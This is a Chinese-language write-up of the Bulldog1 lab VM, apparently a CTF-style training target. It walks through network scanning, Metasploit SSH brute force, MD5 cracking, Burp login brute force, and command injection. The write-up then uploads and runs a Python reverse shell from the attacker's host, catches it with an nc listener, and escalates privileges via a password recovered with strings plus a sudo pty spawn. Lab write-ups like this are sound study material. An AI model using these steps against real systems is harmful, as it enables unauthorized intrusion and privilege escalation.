bulldog1——爆破、命令执行、pty提权

1.收集信息

netdiscover，是一个二层工具，原理是数据包产生交互即判定主机存活
netdiscover -i eth0 -r 192.168.249.0/24

靶机：

端口扫描
Masscan --rate=100000 -p 0-65535 192.168.249.137 (判断出目标是137)
–rate发包数
–ports指定端口数

查看端口服务
Nmap -T4 -sV -O -p 8080,80,23 192.168.249.137
-sV服务版本
-T4速度(最高为5，推荐用4)
-O系统
-p 指定端口

2.开展渗透

尝试爆破ssh
应用msf
Msfconsole

search ssh login

Use

show options
use aux
show options
set rhosts 192.168.249.137
set rport 23
set user_file /root/user.txt
set pass_file/root/pass.txt
run
没有成功就不放图了

判断网站指纹信息
whatweb http://IP (判断网站指纹信息：版本，所用服务器，)

扫描网站目录
dirb http://IP
扫描网站目录扫描网站目录，默认字典

去旁站找线索

进入到一个webshell窗口，提示需要登陆才能使用，所以对其后台的用户名和密码进行破解，在这网页下找到了一些类似于md5加密的东西，可以解密看看是否是用户名密码或者是否于下面的邮箱组成账户名密码等（方式很多尽量考虑全一些）

md5解密

有解密到一些东西可将解密到的东西放到一个txt文档里用burpsuite组合爆破

找到登录页面暴力破解

刷新后进入webshell，发现一个命令执行窗口，试试是否由命令执行漏洞

成功

3.反弹shell

用python脚本去远程连接弹出shell进行提权（前面已经注意到网页是用到python的，所以此处用py脚本试试）

P=subprocess.call(["/bin/bash","-i"])
建立了1个子进程,传入参数"-i"使bash以交互模式启动，这个时候我们的输入输出都会被重定向到socket
python -m SimpleHTTPServer 80(打开一个简易的HTTP服务，在哪个目录下开启，读或上传的就是那个目录下的文件)
在存放shell.py的目录下开启简易WEB服务

执行命令上传shell，IP后边单”/”默认80端口，若指定别的端口需要写成 “:8080/”

查看是否上传成功

nc -nvlp 1234开启监听
cmd中输入pwd&python shell.py

成功getshell

/etc/issue（查看内核版本（不一定能查到））

被拒绝

查看系统中的用户；需要关注的用户bulldogadmin，django
进到home下去找文件用strings查看程序里的东西，凭经验找密码
注意：此处用cat查看不了，因为他是程序字符串

-a linux里显示隐藏文件

组合一下：SUPERultimatePASSWORDyouCANTget
“超级终极密码你不可能得到”

4.提权

python -c ‘import pty; pty.spawn("/bin/bash")’ 打开终端
被拒绝

sudo python -c ‘import pty; pty.spawn("/bin/bash")’ 尝试用root身份打开shell
输入密码：SUPERultimatePASSWORDyouCANTget

提权成功√